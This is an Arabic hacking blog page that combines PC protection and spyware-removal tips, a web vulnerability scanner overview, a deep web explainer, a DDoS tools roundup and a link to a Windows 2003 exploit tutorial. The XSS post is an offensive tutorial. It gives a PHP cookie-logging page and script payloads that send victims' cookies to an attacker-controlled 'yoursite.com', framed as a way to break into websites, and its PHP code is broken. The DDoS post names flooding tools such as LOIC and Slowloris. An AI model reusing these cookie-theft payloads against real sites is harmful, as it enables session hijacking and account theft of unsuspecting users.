طرق حماية الجهاز - كيف تكشف بانك مخترق و كيف تتخلص من برامج التجسس التي في جهازك

عنوان الموضوع واضح جدا ....هو موجه الى كل هاكر خاصة المبتدئين
لانه و كما تعلمون في الاونة الاخيرة كثر اطفال الهاكر و اصبحوا همهم الوحيد اصطياد الضحايا من اي جهة كان .. و كما انت تبحث عن هدف واعلم بانك انت ايضا هدف لقناص اخر .......
لذلك يجب عليك اتخاذ كل الحذر لانك في معركة الكترونية قانونها هو



((البقاء للاقوى))
المهم لا اطيل عليكم الكلام ندخل في صلب الموضوع
اولا الموضوع مقسم الى اجزاء
1- الجزء الاول طرق حماية الجهاز
2-a الجزء الثاني كيف تكشف بانك مخترق و كيف تتخلص من برامج التجسس التي في جهازك
*************************************************
1- عدم فتح أي مرفقات تأتي عن طريق البريد قبل فحصها ببرامج مكافحة الفيروسات وبرامج مكافحات ملفات التجسس .
2- يفضّل عدم تحميل أي برنامج من المواقع الغير معروفة .
3- عدم فتح أو تنصيب أي برنامج قبل فحصه ضد الفيروسات وضد ملفات التجسس .
4- عدم زيارة المواقع المشبوهة مثل المواقع ( الإباحية ) فهي مرتع خصب لكل المصائب .
5- يفضّل الابتعاد عن مواقع ( الشاة ).
6- عدم قبول أي ملف عن طريق الماسنجر.
7- عدم قبول أي محادثة صوتية بالماسنجر .
8- إذا وجدت شخص ما قد قام بإضافتك إلى قائمة المتصلين لديه بالماسنجر وأنت لا تعرفه من الأفضل أن تختار الظهور دون اتصال ثم تقوم بقبوله .. ثم
تضع عليه حضر ثم تحذفه .
9- قم بتركيب أقوى جدار ناري مثل zonealarm .
10- قم بتركيب أقوى مضادات الفيروسات مثل ( norton kasper avira... ) وحدثه باستمرار .
11- قم بتركيب أقوى مضادات ملفات التجسس مثل (anti trojan ) وحدثه باستمرار .
12- قم بتركيب أقوى مضادات الكوكي وحدثه باستمرار
13- الابتعاد عن مواقع الهاكر المشبوهة
14- عمل سكان لجهازك كل 3 ايام
15- تحديث نظام التشغيل لديك لانه قد تكون فيه ثغرات
************************************************** *********
و الان بعدما تعرفنا على وسائل حماية من الهاكر نفترض انه قد تم اختراقك
2- كيف تكشف بانك مخترق وماهي الوسائل للتخلص من ملف التجسس
الطريقة الأولى :
1- أنقر على أبدأ
2- أكتب في خانة التشغيل run الأمر : system.ini ثم أضغط OK سوف تفتح المفكرة .. إذا كان جهازك سليم سوف تجد بالسطر الثالث هذه العبارة ****l=Explorer. exe وإذا وجدت أي زيادة بهذه الجملة مثلاً : نجوم **، أو علامات إستفهام ؟؟ ، أو xxx قم بمسح أي زيادة على تلك الجملة ثم أضغط موافق.
الطريقة الثانية :
1- أنقر على ابدأ
2- اكتب في خانة التشغيل Run الأمر Win.ini
3- موافق
سوف تفتح لك المفكرة الأخرى : لاحظ السطر الخامس والسادس إذا وجدت في أحد هذان السطران أي نجوم *** أو علامات استفهام ؟؟؟ أو xxx قم بمسحها أي ( مسح النجوم وعلامات الاستفهام والأكس ) ثم أضغط موافق .
الطريقة الثالثة : من الدوس :
من الدوس اكتب dir patch ثم أضغط ENTER إذا كان جهازك سليم سوف تكون النتيجة بهذا الشكل
volume in drive c has no label Volume serial number is Directory of \ windows
File not found إذا وجدت الباتش احذفه بالطريقة التالية :
C:\ Windows\ delete patch
الطريقة الرابعة : من ملف تسجيل النظام Registry
1- أنقر على ابدأ
2- أكتب في خانة التشغيل run الأمر التالي Regedit ثم Ok
ثم افتح المجلدات التالية حسب الترتيب التالي :
1- HKEY_LOCAL_MACHINE
2- SOFTWARE
3- MICROSOFT
4- WINDOWS
5- CURRENT VERSION
6- RUN إذا فتحت ملف RUN سوف تفتح لك نافذة تسجيل النظام وسوف تجد في أعلاها من جهة الشمال أسماء الملفات التي تعمل مع قائمة بدء التشغيل وفي أعلاها من جهة اليمين عناوين الملفات هكذا : names __________ data
إذا وجدت ملف لا يقابله عنوان في DATA أو ظهر أمامه سهم صغير هكذا <--- فهو ملف تجسس
تخلص من بالضغط على زر الفارة الأيمن ثم DELETE
أبحث في كل ملفات Run وإذا وجدت أي ملف باسم Patch أو باسم Server.exe أو باسم Explo32 أكتب اسمه كامل ثم قم بحذفه delete ....
ثم أعد تشغيل الجهاز ثم اذهب إلى قائمة ابدأ ثم اختر بحث ثم ابحث عن اسم ملف التجسس اللي أنت حذفته من الريجستري .. اختر البحث في جهاز الكمبيوتر
إذا وجدته قم بحذفه بعد التأكد التام .
الطريقة الخامسة : من قائمة بدأ التشغيل :
1- أنقر على أبدأ
2- اكتب في خانة التشغيل RUN الأمر التالي : MSCONFIG
3- ثم أضغط موافق
4- أفتح بدأ التشغيل وسوف تظهر لك شاشة تعرض لك كل البرامج التي تبدأ العمل مباشرة مع بدأ التشغيل
إذا وجدت أي برنامج غريب لم تقم انت بتنصيبه شيل علامة الصح الموجودة في المربع المقابل لاسم الملف ثم أضغط موافق ثم وافق على إعادة تشغيل الجهاز ينتهي مفعوله



المزيد من التفاصيل


مقال : Arachni منصة إكتشاف ثغرات الويب

logo
Arachni هو برنامج رائع من خلاله تقوم بإختبار إختراق تطبيقات الويب , يعطيك منصة سهلة الإستعمال وبنتائج جد رائعة, تمت برمجته بلغة ruby حيث يقوم هذا البرنامج بعملية مسح كامل لتطبيقات الويب وإكتشاف ثغراتها وعمل إختبار إختراق لها , كما يأتي البرنامج بواجهة رسومية تعمل من خلال المتصفح يسهل العملية بشكل سلس ويوجد كذلك طريقة التشغيل عن سطر الأوامر للمتقدمين .
 معلومات عن Arachni :
المعلومات بشكل عام :
  • Cookie-jar/cookie-string support.
  • Custom header support.
  • SSL support.
  • User Agent spoofing.
  • Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
  • Proxy authentication.
  • Site authentication (Automated form-based, Cookie-Jar, Basic-Digest, NTLM and others)
  • Automatic log-out detection and re-login.
  • Custom 404 page detection.
  • Highlighted command line output.
  • UI abstraction:
    • Command line UI
    • Web UI (Utilizing the Client – Dispatcher RPC infrastructure)
  • Pause/resume functionality.
  • High performance asynchronous HTTP requests.
  • Open RPC Client/Dispatcher Infrastructure
    • Distributed deployment
    • Multiple clients
    • Parallel scans
    • SSL encryption (with peer authentication)
    • Remote monitoring
    • Support for High Performance Grid configuration, combining the resources of multiple nodes to perform fast scans.
محلل HTML :
  • Forms
  • Links
  • Cookies
  • Headers
ثغرات الموقع :
  • Filters for redundant pages like galleries, catalogs, etc based on regular expressions and counters.
  • URL exclusion filter based on regular expressions.
  • URL inclusion filter based on regular expressions.
  • Can optionally follow subdomains.
  • Adjustable link count limit.
  • Adjustable redirect limit.
  • Adjustable depth limit.
  • Modular path extraction via “Path Extractor” components.
  • Can read paths from multiple user supplied files (to both restrict and extend the scope of the crawl).
التقارير النهائية :
Report components allow you to format scan results any way you wish. If the existing reports (HTML, Plain Text, XML, etc.) don’t fulfill your needs it is very easy to create one that suits you.
  • Modular design.
  • New report types can be added as needed.
والكثير من الخصائص تجدونها مع هذه المنصة الرائعة بصراحة شخصيا أعجبت بها وقمت بتجربتها على حاسوبي وسيكون لنا شرح لها إن شاء الله لكيفية إستخدامها أنصح محبي إختبار إختراق تطبيقات الويب بتجربتها لما بها من نتائج جد مبهرة.



المزيد من التفاصيل


الإنترنت المخفي والأنترنت المظلم أحد أسرار الشبكة العنكبوتية


deepwebالإنترنت المخفي والأنترنت المظلم أحد أسرار الشبكة العنكبوتية ,إذ أن شبكة الأنترنت العادية التي نعرفها لاتشكل إلا القليل من حي معرفتنا به فمثلا جبل الجليد نجد نصفه الأعلى مكشوف للعموم أما نصفه المخفي فلا أحد يعلم ماهو عمقه الحقيقي هذا ماينطبق على الأنترنت المخفي والمظلم وماخفي كان أعظم إذا مانعرفه نحن بالأنترنت يشكل فقط سطح جبل الجليد الظاهر أمامنا وماخفي منه تحت الماء هو مانقصد به الأنترنت المخفي والمضلم فهذا النوع من الشبكات والحواسيب مرتبطة بينها فيما لايمكنك تصفحها بشكل عادي ولا يمكنك الوصول إليها إلا بشروط معينة وتحتاج لهذه العملية برامج سوف نشرحها في بقية شرحنا .
يعتبر الأنترنت الخفي والمظلم صعبت التجسس من قبل الحكومات وتعقبها حيث أن أكبر مجموعات الهاكر يقومون بإستخدام هذه الطرق للتخفي وعقد إجتماعاتهم لشن الهجومات على أهدافهم وقد نجد كذلك من بين هذه المواقع والشبكات تستخدم في أمور غير قانونية كترويج الأسلحة أو المواد الممنوعة أو حتى الأعضاء البشرية.
Darknet  & Deepweb هو عالم أنترنت خفي وسري للغاية ولا يمكننا الوصول إليه أو حتى تصفحه بالمتحصفحات العادية المتطورة وحتى مع تقدم التقنيات بجوجل إلا أن أشرفت مواقعه يبقى أمرا غير ممكن أجل فالديب ويب لا يمكن البحث عن مواقعه داخل جوجل ولن تجد لها أي أثر
الفائدة منه ؟
يعتبر   Darknet  & Deepweb كما قلنا مساحة خاصة لعالم الجريمة بكل مافيه سواء كانت جريمة أو سوق سوداء أو تبادل صور أو بيع الأسلحة أو عمل دورات تدريب للهاكر خاصة من طرف المجموعات الشهيرة والكبرى التي تكون مستهدفة من طرف السلطات بحيث نجد Anonymous لها شبكة كبيرة جدا في Deepweb لتعليم أساليب الإختراق وكذلك طرح الأدوات والوسائل البرمجية التي تخصهم وبيع الثغرات والحسبات المصرفية أو ماشابه .

كما يعلم الجميع عندما نريد الدخول لموقع عادي على شبكة الأنترنت نقوم بكتابة مثلا :
www.google.com
يقوم المتصفح Google Chrome & Firefox بتوجيهنا مباشرة للموقع وتصفحه بصورة عادية أما عندما نريد الدخول إلى بعض المواقع داخل الشبكة الخفية لا يمكن ذلك وحتى أسامي المواقع نجدها غريبة مثال على ذلك :
kpvz7ki2v5agwt35.onion/wiki 
كما نلاحظ فدخولنا من المتصفح العادي لا يمكن ذلك ويبقى أمر شبه مستحيل ولو قمنا بالبحث عن الموقع داخل Google لن نجد له أي أتر ولا يمكن ذلك ولكي نقوم بالولوج إلى هذه المواقع وتصفحها يجب توفرنا على برنامج Tor ويبقى هذا الأمر شيء ضروري لكي نتصفح المواقع
كما يمكن للجميع أن يقومو بتجربة إنشاء موقع على شبكة Deepweb ولكن الأمر للتجربة فقط وليس بعمل شيء غير أخلاقي فكما قلنا إستعمال هذا النوع من الأنترنت يكون أكثر في أعمال تخريبية إذا لزيارة الموقع لكي نعمل من خلاله نطاق .onion يرجى زيارة الرابط في أسفل الموضوع.



المزيد من التفاصيل


اختراق المواقع بثغرة XSS

اختراق المواقع بثغرة XSS

ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟
 ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال كود javascript أو HTML او PHP
 ما يجب ان تعرفه HTML,javascript,PHP

 اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع.....
 و معظم هذه الثغرات موجودة في مربعات البحث في المواقع ...
 مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.
www.facebook.com/search.php?q=word
 يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".
 و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟
http://www.facebook.com/search.php?q=<script>alert("XSS")</script>word
 ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "
 هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS
 هذا يعني ان الموقع مصاب بثغرة XSS
لماذا يكون الموقع مصابا بها ؟
 لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل #@$%^,.<>
 ليمنعو من إدخال كود javascript او HTML
هناك نوعين من ثغرات الXSS
 

النوع الدائم :
 يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
 حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .
 <script>alert("XSS")</script>
 و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
 

النوع المؤقت :
 يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟
 

هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS
 أهمها سرقة الكوكيز
 تحتاج الى استضافة موقع تدعم PHP
 ننشئ صفحة PHP مثال stealer.php
 تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET
 الكود :
 <?php
 $data=$_GET["c"]
 $f=open("cookies.tct","w")
 $f.write($data)
 $f.close()
 ?>
 

هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
 هنا دمجنا السكريبت
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو الكوكيز عن طريق الأمر
 document.cookie
 هنا اذا فتحنا الملف
http://yoursite.com/cookies.txt
 ستجد الككيز للمستخدم مكتوبة فيها
 

 اما في الثغرات الدائمة فيكفي ادخال الكود
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 ليسرق الكوكيز
 

و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS
  عن طريق سكريبت



المزيد من التفاصيل


مقال هجمات حجب الخدمة وكيف يتم تنفيذها

من المؤكد ان جميعنا قد سمع بهجمات حجب الخدمة، او ما يعرف ب “DDOS ATTACK” و خاصة ونحن نعيش عدة ثورات عربية لم تخلو من قيام العديد من القراصنة او المجموعات بهجمات استهدفت مواقع حكومية. و من اشهر هذه الهجمات، هجمات حجب الخدمة التي تنفذتها مجموعة “Anonymous” ضد مواقع الحكومة التونسية احتجاجا على العنف المستخدم في مواجهة المتظاهرين.
فماهي هجمات  حجب الخدمة؟ و كيف يتم تنفيذها؟
ما معنى”DDOS” ؟
DDOS وهي اختصار ل “Distributed Denial-of-Service Attack”, وتعني ان مجموعة من اجهزة الكمبيوتر تقوم بمهاجمة سيرفر واحد (خادم واحد) بهدف حجب الخدمة عليه.
DDOS
الكثير من المواقع تحجب عن العمل بسبب هذه الهجمة “Distributed Denial-of-Service Attack”, هذه الهجمة هي من نوع “DoS attack” و تأتي من اكثر من حاسوب او مصدر في نفس الوقت. لكن ما معنى “DoS attack” ؟
هي نوع من الهجمات التي تحاول ان تجعل موارد السيرفر او الخادم غير متاحة للمستخدم. هذا يعني انه عندما يحصل “DoS attack” يتم استهلاك “Traffic” الموقع مما يؤدي الى انقطاع الموقع عن العمل و الظهور للزوار.
و في هذا المقال سيتم استعراض بعض الادوات الي يستخدمها المخترقون لتنفيذ هجماتهم.. (الشرح للغرض العلمي فقط، و انا بريئ ممن يستخدم هذه الادوات في اعمال تخريبية).

LOIC

LOIC هي اختصار ل “Low Orbit Ion Cannon” تم برمجتها بواسطة 4 من الهاكرز. تعتبر من فئة ال “Web Stress Tool” و تم استخدامها اساسا من طرف المخربين او المعروفين بإسم “Script Kiddies”. الشيء الاروع في هذه الاداة هو انه لا يمكن ايقافها اذا ما تم استعمالها ضد موقع واحد من قبل عدد من المهاجمين. هي اداة مفتوحة المصدر، و تعمل على ويندوز.
loic1

Apache Killer

Apache Killer ويعتبر An Internet Threat . هذا السكريبت يقوم بعمل عدد من الطلبات او الهجمات التي تستخدم عديد كبير من ال “ranges of headers” لاستنفاذ الذاكرة. بسبب هذا النوع من الادوات تم تسجيل ارتفاع في هجمات حجب الخدمة او “DoS attacks” التي تطورت في السنوات الاخيرة بصفة ملحوظة! لكن تم صدور اصلاح او ترقيع سريع فور الاعلان عن صدور هذه الاداة.
apache-killer

R-U-Dead-Yet

عندما يقوم Apache Killer بمهاجمة خادمات الويب، يقوم برنامج R-U-Dead-Yet باستغلال ال “HTTP Post Request” لمهاجمة ال “IIS server”.
read-u-yet

SlowLoris

SlowLoris هي اداة مبرمجة من قبل Robert Hansen و تمثل مشكلة كبيرة ل Apache2.
slowloris
سيتم التحدث اكثر عن هجمات حجب الخدمة و كيفية الحماية منها في سلسلة قادمة من التدوينات ان شاء الله. أتمنى عدم نقل الموضوع دون ذكر المدونة واستخدام موفق للجميع.



المزيد من التفاصيل


كيف تصبح هاكر محترف

 

كيف تصبح هاكر محترف انا اضمن لك احتراف الهاكر يعني هاذا هوالباب الاول الذي دخلت منه الى الهاكر

كورس CEH v7 الهاكر الاخلاقي







السلام عليكم ورحمة الله وبركاته ................."قرصان أبيض القبعة" هو المصطلح الاوضح و يطلق على المخترق الذي يملك جميع المعلومات والدراسات التي تجعله هكر أخلاقي.


يساعد الشركات في استعادة مواقعها ودراسة كيفية تمكن المخترق " قبعة سوداء " من السيطرة على السيرفر وبذلك يقوم فوراً بتوفير الحماية اللازمة من تلك الطرق والأساليب والثغرات المستخدمة من قبلهم .


يبدأ المهندس مؤمن هانى في شرح كورس CEH الذي يؤهلك للحصول علي شهادة CEH version6 &7 يمكنكم متابعة الشرح
1-CEH Introduction
2-Introducation to Ethical Hacker 3- Footprinting 4-Scanning Networks 5-DNS Spoofing 6-Phishing 7-Trojon & Backdoors 8-Viruses and Worms 9-Encryption 10-Certified Ethical Hacker - CEH (DDOS Attack) By Eng-Momen Hany 11-Certified Ethical Hacker - CEH (System Hacking) By Eng-Momen Hany 12-Certified Ethical Hacker - CEH (Hacking Wireless) By Eng-Momen Hany



المزيد من التفاصيل


اختراق المواقع


شرح يتحدث عن كيفية إستخدام exploit  في إختراق windows 2003.  شرح يتحدث عن إستخدام  exploit في إختراق windows server 2003 من خلال ثغره ms08_067_netapi من خلال كود exploit  والحصول على windows command shell بكل سهوله


http://www.2shared.com/document/U19Nd_AW/hack_win_2003.html



المزيد من التفاصيل


 

من أنا

المتابعون